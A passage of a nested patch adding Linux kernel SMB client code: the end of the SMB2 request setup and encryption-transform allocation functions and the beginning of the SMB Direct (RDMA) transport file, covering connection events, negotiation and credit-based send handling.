++smb2_check_receive(struct mid_q_entry *mid, struct TCP_Server_Info *server,
++		   bool log_error)
++{
++	unsigned int len = mid->resp_buf_size;
++	struct kvec iov[1];
++	struct smb_rqst rqst = { .rq_iov = iov,
++				 .rq_nvec = 1 };
++
++	iov[0].iov_base = (char *)mid->resp_buf;
++	iov[0].iov_len = len;
++
++	dump_smb(mid->resp_buf, min_t(u32, 80, len));
++	/* if the response is signed, verify the signature before using it */
++	if (len > 24 && server->sign && !mid->decrypted) {
++		int rc;
++
++		rc = smb2_verify_signature(&rqst, server);
++		if (rc)
++			cifs_server_dbg(VFS, "SMB signature verification returned error = %d\n",
++				 rc);
++	}
++
++	return map_smb2_to_linux_error(mid->resp_buf, log_error);
++}
++
++struct mid_q_entry *
++smb2_setup_request(struct cifs_ses *ses, struct TCP_Server_Info *server,
++		   struct smb_rqst *rqst)
++{
++	int rc;
++	struct smb2_hdr *shdr =
++			(struct smb2_hdr *)rqst->rq_iov[0].iov_base;
++	struct mid_q_entry *mid;
++
++	smb2_seq_num_into_buf(server, shdr);
++
++	rc = smb2_get_mid_entry(ses, server, shdr, &mid);
++	if (rc) {
++		revert_current_mid_from_hdr(server, shdr);
++		return ERR_PTR(rc);
++	}
++
++	rc = smb2_sign_rqst(rqst, server);
++	if (rc) {
++		revert_current_mid_from_hdr(server, shdr);
++		delete_mid(mid);
++		return ERR_PTR(rc);
++	}
++
++	return mid;
++}
++
++struct mid_q_entry *
++smb2_setup_async_request(struct TCP_Server_Info *server, struct smb_rqst *rqst)
++{
++	int rc;
++	struct smb2_hdr *shdr =
++			(struct smb2_hdr *)rqst->rq_iov[0].iov_base;
++	struct mid_q_entry *mid;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedNegotiate &&
++	   shdr->Command != SMB2_NEGOTIATE) {
++		spin_unlock(&server->srv_lock);
++		return ERR_PTR(-EAGAIN);
++	}
++	spin_unlock(&server->srv_lock);
++
++	smb2_seq_num_into_buf(server, shdr);
++
++	mid = smb2_mid_entry_alloc(shdr, server);
++	if (mid == NULL) {
++		revert_current_mid_from_hdr(server, shdr);
++		return ERR_PTR(-ENOMEM);
++	}
++
++	rc = smb2_sign_rqst(rqst, server);
++	if (rc) {
++		revert_current_mid_from_hdr(server, shdr);
++		release_mid(mid);
++		return ERR_PTR(rc);
++	}
++
++	return mid;
++}
++
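++/*
++ * Allocate the AEAD transforms used for SMB3 encryption.  Separate
++ * enc and dec transforms are kept because the ServerIn and ServerOut
++ * keys differ; the keys themselves are only attached when a message
++ * is actually encrypted or decrypted.
++ */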
++int
++smb3_crypto_aead_allocate(struct TCP_Server_Info *server)
++{
++	struct crypto_aead *tfm;
++
++	if (!server->secmech.enc) {
++		if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
++		    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
++			tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
++		else
++			tfm = crypto_alloc_aead("ccm(aes)", 0, 0);
++		if (IS_ERR(tfm)) {
++			cifs_server_dbg(VFS, "%s: Failed alloc encrypt aead\n",
++				 __func__);
++			return PTR_ERR(tfm);
++		}
++		server->secmech.enc = tfm;
++	}
++
++	if (!server->secmech.dec) {
++		if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
++		    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
++			tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
++		else
++			tfm = crypto_alloc_aead("ccm(aes)", 0, 0);
++		if (IS_ERR(tfm)) {
++			crypto_free_aead(server->secmech.enc);
++			server->secmech.enc = NULL;
++			cifs_server_dbg(VFS, "%s: Failed to alloc decrypt aead\n",
++				 __func__);
++			return PTR_ERR(tfm);
++		}
++		server->secmech.dec = tfm;
++	}
++
++	return 0;
++}
+diff --git a/fs/smb/client/smbdirect.c b/fs/smb/client/smbdirect.c
+new file mode 100644
+index 0000000000000..cf923f211c512
+--- /dev/null
++++ b/fs/smb/client/smbdirect.c
+@@ -0,0 +1,2494 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2017, Microsoft Corporation.
++ *
++ *   Author(s): Long Li <longli@microsoft.com>
++ */
++#include <linux/module.h>
++#include <linux/highmem.h>
++#include "smbdirect.h"
++#include "cifs_debug.h"
++#include "cifsproto.h"
++#include "smb2proto.h"
++
++static struct smbd_response *get_empty_queue_buffer(
++		struct smbd_connection *info);
++static struct smbd_response *get_receive_buffer(
++		struct smbd_connection *info);
++static void put_receive_buffer(
++		struct smbd_connection *info,
++		struct smbd_response *response);
++static int allocate_receive_buffers(struct smbd_connection *info, int num_buf);
++static void destroy_receive_buffers(struct smbd_connection *info);
++
++static void put_empty_packet(
++		struct smbd_connection *info, struct smbd_response *response);
++static void enqueue_reassembly(
++		struct smbd_connection *info,
++		struct smbd_response *response, int data_length);
++static struct smbd_response *_get_first_reassembly(
++		struct smbd_connection *info);
++
++static int smbd_post_recv(
++		struct smbd_connection *info,
++		struct smbd_response *response);
++
++static int smbd_post_send_empty(struct smbd_connection *info);
++static int smbd_post_send_data(
++		struct smbd_connection *info,
++		struct kvec *iov, int n_vec, int remaining_data_length);
++static int smbd_post_send_page(struct smbd_connection *info,
++		struct page *page, unsigned long offset,
++		size_t size, int remaining_data_length);
++
++static void destroy_mr_list(struct smbd_connection *info);
++static int allocate_mr_list(struct smbd_connection *info);
++
++/* SMBD version number */
++#define SMBD_V1	0x0100
++
++/* Port numbers for SMBD transport */
++#define SMB_PORT	445
++#define SMBD_PORT	5445
++
++/* Address lookup and resolve timeout in ms */
++#define RDMA_RESOLVE_TIMEOUT	5000
++
++/* SMBD negotiation timeout in seconds */
++#define SMBD_NEGOTIATE_TIMEOUT	120
++
++/* SMBD minimum receive size and fragmented size defined in [MS-SMBD] */
++#define SMBD_MIN_RECEIVE_SIZE		128
++#define SMBD_MIN_FRAGMENTED_SIZE	131072
++
++/*
++ * Default maximum number of RDMA read/write outstanding on this connection
++ * This value may be decreased during QP creation if the hardware limit is lower
++ */
++#define SMBD_CM_RESPONDER_RESOURCES	32
++
++/* Maximum number of retries on data transfer operations */
++#define SMBD_CM_RETRY			6
++/* No need to retry on Receiver Not Ready since SMBD manages credits */
++#define SMBD_CM_RNR_RETRY		0
++
++/*
++ * User configurable initial values per SMBD transport connection
++ * as defined in [MS-SMBD] 3.1.1.1
++ * These may change after SMBD negotiation
++ */
++/* The local peer's maximum number of credits to grant to the peer */
++int smbd_receive_credit_max = 255;
++
++/* The remote peer's credit request of local peer */
++int smbd_send_credit_target = 255;
++
++/* The maximum size of a single message that can be sent to the remote peer */
++int smbd_max_send_size = 1364;
++
++/*  The maximum fragmented upper-layer payload receive size supported */
++int smbd_max_fragmented_recv_size = 1024 * 1024;
++
++/*  The maximum single-message size which can be received */
++int smbd_max_receive_size = 1364;
++
++/* The timeout to initiate send of a keepalive message on idle */
++int smbd_keep_alive_interval = 120;
++
++/*
++ * User configurable initial values for RDMA transport
++ * The actual values used may be lower and are limited to hardware capabilities
++ */
++/* Default maximum number of pages in a single RDMA write/read */
++int smbd_max_frmr_depth = 2048;
++
++/* If the payload is less than this many bytes, use RDMA send/recv, not read/write */
++int rdma_readwrite_threshold = 4096;
++
++/* Transport logging functions
++ * Logging is defined as classes. They can be OR'ed to select which
++ * classes get logged via the module parameter smbd_logging_class,
++ * e.g. cifs.smbd_logging_class=0xa0 will log all log_rdma_recv() and
++ * log_rdma_event() messages.
++ */
++#define LOG_OUTGOING			0x1
++#define LOG_INCOMING			0x2
++#define LOG_READ			0x4
++#define LOG_WRITE			0x8
++#define LOG_RDMA_SEND			0x10
++#define LOG_RDMA_RECV			0x20
++#define LOG_KEEP_ALIVE			0x40
++#define LOG_RDMA_EVENT			0x80
++#define LOG_RDMA_MR			0x100
++static unsigned int smbd_logging_class;
++module_param(smbd_logging_class, uint, 0644);
++MODULE_PARM_DESC(smbd_logging_class,
++	"Logging class for SMBD transport 0x0 to 0x100");
++
++#define ERR		0x0
++#define INFO		0x1
++static unsigned int smbd_logging_level = ERR;
++module_param(smbd_logging_level, uint, 0644);
++MODULE_PARM_DESC(smbd_logging_level,
++	"Logging level for SMBD transport, 0 (default): error, 1: info");
++
++#define log_rdma(level, class, fmt, args...)				\
++do {									\
++	if (level <= smbd_logging_level || class & smbd_logging_class)	\
++		cifs_dbg(VFS, "%s:%d " fmt, __func__, __LINE__, ##args);\
++} while (0)
++
++#define log_outgoing(level, fmt, args...) \
++		log_rdma(level, LOG_OUTGOING, fmt, ##args)
++#define log_incoming(level, fmt, args...) \
++		log_rdma(level, LOG_INCOMING, fmt, ##args)
++#define log_read(level, fmt, args...)	log_rdma(level, LOG_READ, fmt, ##args)
++#define log_write(level, fmt, args...)	log_rdma(level, LOG_WRITE, fmt, ##args)
++#define log_rdma_send(level, fmt, args...) \
++		log_rdma(level, LOG_RDMA_SEND, fmt, ##args)
++#define log_rdma_recv(level, fmt, args...) \
++		log_rdma(level, LOG_RDMA_RECV, fmt, ##args)
++#define log_keep_alive(level, fmt, args...) \
++		log_rdma(level, LOG_KEEP_ALIVE, fmt, ##args)
++#define log_rdma_event(level, fmt, args...) \
++		log_rdma(level, LOG_RDMA_EVENT, fmt, ##args)
++#define log_rdma_mr(level, fmt, args...) \
++		log_rdma(level, LOG_RDMA_MR, fmt, ##args)
++
++static void smbd_disconnect_rdma_work(struct work_struct *work)
++{
++	struct smbd_connection *info =
++		container_of(work, struct smbd_connection, disconnect_work);
++
++	if (info->transport_status == SMBD_CONNECTED) {
++		info->transport_status = SMBD_DISCONNECTING;
++		rdma_disconnect(info->id);
++	}
++}
++
++static void smbd_disconnect_rdma_connection(struct smbd_connection *info)
++{
++	queue_work(info->workqueue, &info->disconnect_work);
++}
++
++/* Upcall from RDMA CM */
++static int smbd_conn_upcall(
++		struct rdma_cm_id *id, struct rdma_cm_event *event)
++{
++	struct smbd_connection *info = id->context;
++
++	log_rdma_event(INFO, "event=%d status=%d\n",
++		event->event, event->status);
++
++	switch (event->event) {
++	case RDMA_CM_EVENT_ADDR_RESOLVED:
++	case RDMA_CM_EVENT_ROUTE_RESOLVED:
++		info->ri_rc = 0;
++		complete(&info->ri_done);
++		break;
++
++	case RDMA_CM_EVENT_ADDR_ERROR:
++		info->ri_rc = -EHOSTUNREACH;
++		complete(&info->ri_done);
++		break;
++
++	case RDMA_CM_EVENT_ROUTE_ERROR:
++		info->ri_rc = -ENETUNREACH;
++		complete(&info->ri_done);
++		break;
++
++	case RDMA_CM_EVENT_ESTABLISHED:
++		log_rdma_event(INFO, "connected event=%d\n", event->event);
++		info->transport_status = SMBD_CONNECTED;
++		wake_up_interruptible(&info->conn_wait);
++		break;
++
++	case RDMA_CM_EVENT_CONNECT_ERROR:
++	case RDMA_CM_EVENT_UNREACHABLE:
++	case RDMA_CM_EVENT_REJECTED:
++		log_rdma_event(INFO, "connecting failed event=%d\n", event->event);
++		info->transport_status = SMBD_DISCONNECTED;
++		wake_up_interruptible(&info->conn_wait);
++		break;
++
++	case RDMA_CM_EVENT_DEVICE_REMOVAL:
++	case RDMA_CM_EVENT_DISCONNECTED:
++		/* This happens when we fail the negotiation */
++		if (info->transport_status == SMBD_NEGOTIATE_FAILED) {
++			info->transport_status = SMBD_DISCONNECTED;
++			wake_up(&info->conn_wait);
++			break;
++		}
++
++		info->transport_status = SMBD_DISCONNECTED;
++		wake_up_interruptible(&info->disconn_wait);
++		wake_up_interruptible(&info->wait_reassembly_queue);
++		wake_up_interruptible_all(&info->wait_send_queue);
++		break;
++
++	default:
++		break;
++	}
++
++	return 0;
++}
++
++/* Upcall from RDMA QP */
++static void
++smbd_qp_async_error_upcall(struct ib_event *event, void *context)
++{
++	struct smbd_connection *info = context;
++
++	log_rdma_event(ERR, "%s on device %s info %p\n",
++		ib_event_msg(event->event), event->device->name, info);
++
++	switch (event->event) {
++	case IB_EVENT_CQ_ERR:
++	case IB_EVENT_QP_FATAL:
++		smbd_disconnect_rdma_connection(info);
++		break;
++
++	default:
++		break;
++	}
++}
++
++static inline void *smbd_request_payload(struct smbd_request *request)
++{
++	return (void *)request->packet;
++}
++
++static inline void *smbd_response_payload(struct smbd_response *response)
++{
++	return (void *)response->packet;
++}
++
++/* Called when a RDMA send is done */
++static void send_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	int i;
++	struct smbd_request *request =
++		container_of(wc->wr_cqe, struct smbd_request, cqe);
++
++	log_rdma_send(INFO, "smbd_request 0x%p completed wc->status=%d\n",
++		request, wc->status);
++
++	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_SEND) {
++		log_rdma_send(ERR, "wc->status=%d wc->opcode=%d\n",
++			wc->status, wc->opcode);
++		smbd_disconnect_rdma_connection(request->info);
++	}
++
++	for (i = 0; i < request->num_sge; i++)
++		ib_dma_unmap_single(request->info->id->device,
++			request->sge[i].addr,
++			request->sge[i].length,
++			DMA_TO_DEVICE);
++
++	if (atomic_dec_and_test(&request->info->send_pending))
++		wake_up(&request->info->wait_send_pending);
++
++	wake_up(&request->info->wait_post_send);
++
++	mempool_free(request, request->info->request_mempool);
++}
++
++static void dump_smbd_negotiate_resp(struct smbd_negotiate_resp *resp)
++{
++	log_rdma_event(INFO, "resp message min_version %u max_version %u negotiated_version %u credits_requested %u credits_granted %u status %u max_readwrite_size %u preferred_send_size %u max_receive_size %u max_fragmented_size %u\n",
++		       resp->min_version, resp->max_version,
++		       resp->negotiated_version, resp->credits_requested,
++		       resp->credits_granted, resp->status,
++		       resp->max_readwrite_size, resp->preferred_send_size,
++		       resp->max_receive_size, resp->max_fragmented_size);
++}
++
++/*
++ * Process a negotiation response message, according to [MS-SMBD] 3.1.5.7
++ * response, packet_length: the negotiation response message
++ * return value: true if negotiation is a success, false if failed
++ */
++static bool process_negotiation_response(
++		struct smbd_response *response, int packet_length)
++{
++	struct smbd_connection *info = response->info;
++	struct smbd_negotiate_resp *packet = smbd_response_payload(response);
++
++	if (packet_length < sizeof(struct smbd_negotiate_resp)) {
++		log_rdma_event(ERR,
++			"error: packet_length=%d\n", packet_length);
++		return false;
++	}
++
++	if (le16_to_cpu(packet->negotiated_version) != SMBD_V1) {
++		log_rdma_event(ERR, "error: negotiated_version=%x\n",
++			le16_to_cpu(packet->negotiated_version));
++		return false;
++	}
++	info->protocol = le16_to_cpu(packet->negotiated_version);
++
++	if (packet->credits_requested == 0) {
++		log_rdma_event(ERR, "error: credits_requested==0\n");
++		return false;
++	}
++	info->receive_credit_target = le16_to_cpu(packet->credits_requested);
++
++	if (packet->credits_granted == 0) {
++		log_rdma_event(ERR, "error: credits_granted==0\n");
++		return false;
++	}
++	atomic_set(&info->send_credits, le16_to_cpu(packet->credits_granted));
++
++	atomic_set(&info->receive_credits, 0);
++
++	if (le32_to_cpu(packet->preferred_send_size) > info->max_receive_size) {
++		log_rdma_event(ERR, "error: preferred_send_size=%d\n",
++			le32_to_cpu(packet->preferred_send_size));
++		return false;
++	}
++	info->max_receive_size = le32_to_cpu(packet->preferred_send_size);
++
++	if (le32_to_cpu(packet->max_receive_size) < SMBD_MIN_RECEIVE_SIZE) {
++		log_rdma_event(ERR, "error: max_receive_size=%d\n",
++			le32_to_cpu(packet->max_receive_size));
++		return false;
++	}
++	info->max_send_size = min_t(int, info->max_send_size,
++					le32_to_cpu(packet->max_receive_size));
++
++	if (le32_to_cpu(packet->max_fragmented_size) <
++			SMBD_MIN_FRAGMENTED_SIZE) {
++		log_rdma_event(ERR, "error: max_fragmented_size=%d\n",
++			le32_to_cpu(packet->max_fragmented_size));
++		return false;
++	}
++	info->max_fragmented_send_size =
++		le32_to_cpu(packet->max_fragmented_size);
++	info->rdma_readwrite_threshold =
++		rdma_readwrite_threshold > info->max_fragmented_send_size ?
++		info->max_fragmented_send_size :
++		rdma_readwrite_threshold;
++
++	info->max_readwrite_size = min_t(u32,
++			le32_to_cpu(packet->max_readwrite_size),
++			info->max_frmr_depth * PAGE_SIZE);
++	info->max_frmr_depth = info->max_readwrite_size / PAGE_SIZE;
++
++	return true;
++}
++
++static void smbd_post_send_credits(struct work_struct *work)
++{
++	int ret = 0;
++	int use_receive_queue = 1;
++	int rc;
++	struct smbd_response *response;
++	struct smbd_connection *info =
++		container_of(work, struct smbd_connection,
++			post_send_credits_work);
++
++	if (info->transport_status != SMBD_CONNECTED) {
++		wake_up(&info->wait_receive_queues);
++		return;
++	}
++
++	if (info->receive_credit_target >
++		atomic_read(&info->receive_credits)) {
++		while (true) {
++			if (use_receive_queue)
++				response = get_receive_buffer(info);
++			else
++				response = get_empty_queue_buffer(info);
++			if (!response) {
++				/* now switch to empty packet queue */
++				if (use_receive_queue) {
++					use_receive_queue = 0;
++					continue;
++				} else
++					break;
++			}
++
++			response->type = SMBD_TRANSFER_DATA;
++			response->first_segment = false;
++			rc = smbd_post_recv(info, response);
++			if (rc) {
++				log_rdma_recv(ERR,
++					"post_recv failed rc=%d\n", rc);
++				put_receive_buffer(info, response);
++				break;
++			}
++
++			ret++;
++		}
++	}
++
++	spin_lock(&info->lock_new_credits_offered);
++	info->new_credits_offered += ret;
++	spin_unlock(&info->lock_new_credits_offered);
++
++	/* Promptly send an immediate packet as defined in [MS-SMBD] 3.1.1.1 */
++	info->send_immediate = true;
++	if (atomic_read(&info->receive_credits) <
++		info->receive_credit_target - 1) {
++		if (info->keep_alive_requested == KEEP_ALIVE_PENDING ||
++		    info->send_immediate) {
++			log_keep_alive(INFO, "send an empty message\n");
++			smbd_post_send_empty(info);
++		}
++	}
++}
++
++/* Called from softirq, when recv is done */
++static void recv_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	struct smbd_data_transfer *data_transfer;
++	struct smbd_response *response =
++		container_of(wc->wr_cqe, struct smbd_response, cqe);
++	struct smbd_connection *info = response->info;
++	int data_length = 0;
++
++	log_rdma_recv(INFO, "response=0x%p type=%d wc status=%d wc opcode %d byte_len=%d pkey_index=%u\n",
++		      response, response->type, wc->status, wc->opcode,
++		      wc->byte_len, wc->pkey_index);
++
++	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_RECV) {
++		log_rdma_recv(INFO, "wc->status=%d opcode=%d\n",
++			wc->status, wc->opcode);
++		smbd_disconnect_rdma_connection(info);
++		goto error;
++	}
++
++	ib_dma_sync_single_for_cpu(
++		wc->qp->device,
++		response->sge.addr,
++		response->sge.length,
++		DMA_FROM_DEVICE);
++
++	switch (response->type) {
++	/* SMBD negotiation response */
++	case SMBD_NEGOTIATE_RESP:
++		dump_smbd_negotiate_resp(smbd_response_payload(response));
++		info->full_packet_received = true;
++		info->negotiate_done =
++			process_negotiation_response(response, wc->byte_len);
++		complete(&info->negotiate_completion);
++		break;
++
++	/* SMBD data transfer packet */
++	case SMBD_TRANSFER_DATA:
++		data_transfer = smbd_response_payload(response);
++		data_length = le32_to_cpu(data_transfer->data_length);
++
++		/*
++		 * If this is a packet with data payload, place the data in the
++		 * reassembly queue and wake up the reading thread.
++		 */
++		if (data_length) {
++			if (info->full_packet_received)
++				response->first_segment = true;
++
++			if (le32_to_cpu(data_transfer->remaining_data_length))
++				info->full_packet_received = false;
++			else
++				info->full_packet_received = true;
++
++			enqueue_reassembly(
++				info,
++				response,
++				data_length);
++		} else
++			put_empty_packet(info, response);
++
++		if (data_length)
++			wake_up_interruptible(&info->wait_reassembly_queue);
++
++		atomic_dec(&info->receive_credits);
++		info->receive_credit_target =
++			le16_to_cpu(data_transfer->credits_requested);
++		if (le16_to_cpu(data_transfer->credits_granted)) {
++			atomic_add(le16_to_cpu(data_transfer->credits_granted),
++				&info->send_credits);
++			/*
++			 * We have new send credits granted from remote peer
++			 * If any sender is waiting for credits, unblock it
++			 */
++			wake_up_interruptible(&info->wait_send_queue);
++		}
++
++		log_incoming(INFO, "data flags %d data_offset %d data_length %d remaining_data_length %d\n",
++			     le16_to_cpu(data_transfer->flags),
++			     le32_to_cpu(data_transfer->data_offset),
++			     le32_to_cpu(data_transfer->data_length),
++			     le32_to_cpu(data_transfer->remaining_data_length));
++
++		/* Send a KEEP_ALIVE response right away if requested */
++		info->keep_alive_requested = KEEP_ALIVE_NONE;
++		if (le16_to_cpu(data_transfer->flags) &
++				SMB_DIRECT_RESPONSE_REQUESTED) {
++			info->keep_alive_requested = KEEP_ALIVE_PENDING;
++		}
++
++		return;
++
++	default:
++		log_rdma_recv(ERR,
++			"unexpected response type=%d\n", response->type);
++	}
++
++error:
++	put_receive_buffer(info, response);
++}
++
++static struct rdma_cm_id *smbd_create_id(
++		struct smbd_connection *info,
++		struct sockaddr *dstaddr, int port)
++{
++	struct rdma_cm_id *id;
++	int rc;
++	__be16 *sport;
++
++	id = rdma_create_id(&init_net, smbd_conn_upcall, info,
++		RDMA_PS_TCP, IB_QPT_RC);
++	if (IS_ERR(id)) {
++		rc = PTR_ERR(id);
++		log_rdma_event(ERR, "rdma_create_id() failed %i\n", rc);
++		return id;
++	}
++
++	if (dstaddr->sa_family == AF_INET6)
++		sport = &((struct sockaddr_in6 *)dstaddr)->sin6_port;
++	else
++		sport = &((struct sockaddr_in *)dstaddr)->sin_port;
++
++	*sport = htons(port);
++
++	init_completion(&info->ri_done);
++	info->ri_rc = -ETIMEDOUT;
++
++	rc = rdma_resolve_addr(id, NULL, (struct sockaddr *)dstaddr,
++		RDMA_RESOLVE_TIMEOUT);
++	if (rc) {
++		log_rdma_event(ERR, "rdma_resolve_addr() failed %i\n", rc);
++		goto out;
++	}
++	rc = wait_for_completion_interruptible_timeout(
++		&info->ri_done, msecs_to_jiffies(RDMA_RESOLVE_TIMEOUT));
++	/* e.g. if interrupted returns -ERESTARTSYS */
++	if (rc < 0) {
++		log_rdma_event(ERR, "rdma_resolve_addr timeout rc: %i\n", rc);
++		goto out;
++	}
++	rc = info->ri_rc;
++	if (rc) {
++		log_rdma_event(ERR, "rdma_resolve_addr() completed %i\n", rc);
++		goto out;
++	}
++
++	info->ri_rc = -ETIMEDOUT;
++	rc = rdma_resolve_route(id, RDMA_RESOLVE_TIMEOUT);
++	if (rc) {
++		log_rdma_event(ERR, "rdma_resolve_route() failed %i\n", rc);
++		goto out;
++	}
++	rc = wait_for_completion_interruptible_timeout(
++		&info->ri_done, msecs_to_jiffies(RDMA_RESOLVE_TIMEOUT));
++	/* e.g. if interrupted returns -ERESTARTSYS */
++	if (rc < 0)  {
++		log_rdma_event(ERR, "rdma_resolve_addr timeout rc: %i\n", rc);
++		goto out;
++	}
++	rc = info->ri_rc;
++	if (rc) {
++		log_rdma_event(ERR, "rdma_resolve_route() completed %i\n", rc);
++		goto out;
++	}
++
++	return id;
++
++out:
++	rdma_destroy_id(id);
++	return ERR_PTR(rc);
++}
++
++/*
++ * Test if FRWR (Fast Registration Work Requests) is supported on the device
++ * This implementation requires FRWR for RDMA read/write
++ * return value: true if it is supported
++ */
++static bool frwr_is_supported(struct ib_device_attr *attrs)
++{
++	if (!(attrs->device_cap_flags & IB_DEVICE_MEM_MGT_EXTENSIONS))
++		return false;
++	if (attrs->max_fast_reg_page_list_len == 0)
++		return false;
++	return true;
++}
++
++static int smbd_ia_open(
++		struct smbd_connection *info,
++		struct sockaddr *dstaddr, int port)
++{
++	int rc;
++
++	info->id = smbd_create_id(info, dstaddr, port);
++	if (IS_ERR(info->id)) {
++		rc = PTR_ERR(info->id);
++		goto out1;
++	}
++
++	if (!frwr_is_supported(&info->id->device->attrs)) {
++		log_rdma_event(ERR, "Fast Registration Work Requests (FRWR) is not supported\n");
++		log_rdma_event(ERR, "Device capability flags = %llx max_fast_reg_page_list_len = %u\n",
++			       info->id->device->attrs.device_cap_flags,
++			       info->id->device->attrs.max_fast_reg_page_list_len);
++		rc = -EPROTONOSUPPORT;
++		goto out2;
++	}
++	info->max_frmr_depth = min_t(int,
++		smbd_max_frmr_depth,
++		info->id->device->attrs.max_fast_reg_page_list_len);
++	info->mr_type = IB_MR_TYPE_MEM_REG;
++	if (info->id->device->attrs.kernel_cap_flags & IBK_SG_GAPS_REG)
++		info->mr_type = IB_MR_TYPE_SG_GAPS;
++
++	info->pd = ib_alloc_pd(info->id->device, 0);
++	if (IS_ERR(info->pd)) {
++		rc = PTR_ERR(info->pd);
++		log_rdma_event(ERR, "ib_alloc_pd() returned %d\n", rc);
++		goto out2;
++	}
++
++	return 0;
++
++out2:
++	rdma_destroy_id(info->id);
++	info->id = NULL;
++
++out1:
++	return rc;
++}
++
++/*
++ * Send a negotiation request message to the peer
++ * The negotiation procedure is in [MS-SMBD] 3.1.5.2 and 3.1.5.3
++ * After negotiation, the transport is connected and ready for
++ * carrying upper layer SMB payload
++ */
++static int smbd_post_send_negotiate_req(struct smbd_connection *info)
++{
++	struct ib_send_wr send_wr;
++	int rc = -ENOMEM;
++	struct smbd_request *request;
++	struct smbd_negotiate_req *packet;
++
++	request = mempool_alloc(info->request_mempool, GFP_KERNEL);
++	if (!request)
++		return rc;
++
++	request->info = info;
++
++	packet = smbd_request_payload(request);
++	packet->min_version = cpu_to_le16(SMBD_V1);
++	packet->max_version = cpu_to_le16(SMBD_V1);
++	packet->reserved = 0;
++	packet->credits_requested = cpu_to_le16(info->send_credit_target);
++	packet->preferred_send_size = cpu_to_le32(info->max_send_size);
++	packet->max_receive_size = cpu_to_le32(info->max_receive_size);
++	packet->max_fragmented_size =
++		cpu_to_le32(info->max_fragmented_recv_size);
++
++	request->num_sge = 1;
++	request->sge[0].addr = ib_dma_map_single(
++				info->id->device, (void *)packet,
++				sizeof(*packet), DMA_TO_DEVICE);
++	if (ib_dma_mapping_error(info->id->device, request->sge[0].addr)) {
++		rc = -EIO;
++		goto dma_mapping_failed;
++	}
++
++	request->sge[0].length = sizeof(*packet);
++	request->sge[0].lkey = info->pd->local_dma_lkey;
++
++	ib_dma_sync_single_for_device(
++		info->id->device, request->sge[0].addr,
++		request->sge[0].length, DMA_TO_DEVICE);
++
++	request->cqe.done = send_done;
++
++	send_wr.next = NULL;
++	send_wr.wr_cqe = &request->cqe;
++	send_wr.sg_list = request->sge;
++	send_wr.num_sge = request->num_sge;
++	send_wr.opcode = IB_WR_SEND;
++	send_wr.send_flags = IB_SEND_SIGNALED;
++
++	log_rdma_send(INFO, "sge addr=0x%llx length=%u lkey=0x%x\n",
++		request->sge[0].addr,
++		request->sge[0].length, request->sge[0].lkey);
++
++	atomic_inc(&info->send_pending);
++	rc = ib_post_send(info->id->qp, &send_wr, NULL);
++	if (!rc)
++		return 0;
++
++	/* if we reach here, post send failed */
++	log_rdma_send(ERR, "ib_post_send failed rc=%d\n", rc);
++	atomic_dec(&info->send_pending);
++	ib_dma_unmap_single(info->id->device, request->sge[0].addr,
++		request->sge[0].length, DMA_TO_DEVICE);
++
++	smbd_disconnect_rdma_connection(info);
++
++dma_mapping_failed:
++	mempool_free(request, info->request_mempool);
++	return rc;
++}
++
++/*
++ * Extend the credits to remote peer
++ * This implements [MS-SMBD] 3.1.5.9
++ * The idea is that we should extend credits to remote peer as quickly as
++ * it's allowed, to maintain data flow. We allocate as much receive
++ * buffer as possible, and extend the receive credits to remote peer
++ * return value: the new credits being granted.
++ */
++static int manage_credits_prior_sending(struct smbd_connection *info)
++{
++	int new_credits;
++
++	spin_lock(&info->lock_new_credits_offered);
++	new_credits = info->new_credits_offered;
++	info->new_credits_offered = 0;
++	spin_unlock(&info->lock_new_credits_offered);
++
++	return new_credits;
++}
++
++/*
++ * Check if we need to send a KEEP_ALIVE message
++ * The idle connection timer triggers a KEEP_ALIVE message when it expires
++ * SMB_DIRECT_RESPONSE_REQUESTED is set in the message flag to have peer send
++ * back a response.
++ * return value:
++ * 1 if SMB_DIRECT_RESPONSE_REQUESTED needs to be set
++ * 0: otherwise
++ */
++static int manage_keep_alive_before_sending(struct smbd_connection *info)
++{
++	if (info->keep_alive_requested == KEEP_ALIVE_PENDING) {
++		info->keep_alive_requested = KEEP_ALIVE_SENT;
++		return 1;
++	}
++	return 0;
++}
++
++/* Post the send request */
++static int smbd_post_send(struct smbd_connection *info,
++		struct smbd_request *request)
++{
++	struct ib_send_wr send_wr;
++	int rc, i;
++
++	for (i = 0; i < request->num_sge; i++) {
++		log_rdma_send(INFO,
++			"rdma_request sge[%d] addr=0x%llx length=%u\n",
++			i, request->sge[i].addr, request->sge[i].length);
++		ib_dma_sync_single_for_device(
++			info->id->device,
++			request->sge[i].addr,
++			request->sge[i].length,
++			DMA_TO_DEVICE);
++	}
++
++	request->cqe.done = send_done;
++
++	send_wr.next = NULL;
++	send_wr.wr_cqe = &request->cqe;
++	send_wr.sg_list = request->sge;
++	send_wr.num_sge = request->num_sge;
++	send_wr.opcode = IB_WR_SEND;
++	send_wr.send_flags = IB_SEND_SIGNALED;
++
++	rc = ib_post_send(info->id->qp, &send_wr, NULL);
++	if (rc) {
++		log_rdma_send(ERR, "ib_post_send failed rc=%d\n", rc);
++		smbd_disconnect_rdma_connection(info);
++		rc = -EAGAIN;
++	} else
++		/* Reset timer for idle connection after packet is sent */
++		mod_delayed_work(info->workqueue, &info->idle_timer_work,
++			info->keep_alive_interval*HZ);
++
++	return rc;
++}
++
++static int smbd_post_send_sgl(struct smbd_connection *info,
++	struct scatterlist *sgl, int data_length, int remaining_data_length)
++{
++	int num_sgs;
++	int i, rc;
++	int header_length;
++	struct smbd_request *request;
++	struct smbd_data_transfer *packet;
++	int new_credits;
++	struct scatterlist *sg;
++
++wait_credit:
++	/* Wait for send credits. An SMBD packet needs one credit */
++	rc = wait_event_interruptible(info->wait_send_queue,
++		atomic_read(&info->send_credits) > 0 ||
++		info->transport_status != SMBD_CONNECTED);
++	if (rc)
++		goto err_wait_credit;
++
++	if (info->transport_status != SMBD_CONNECTED) {
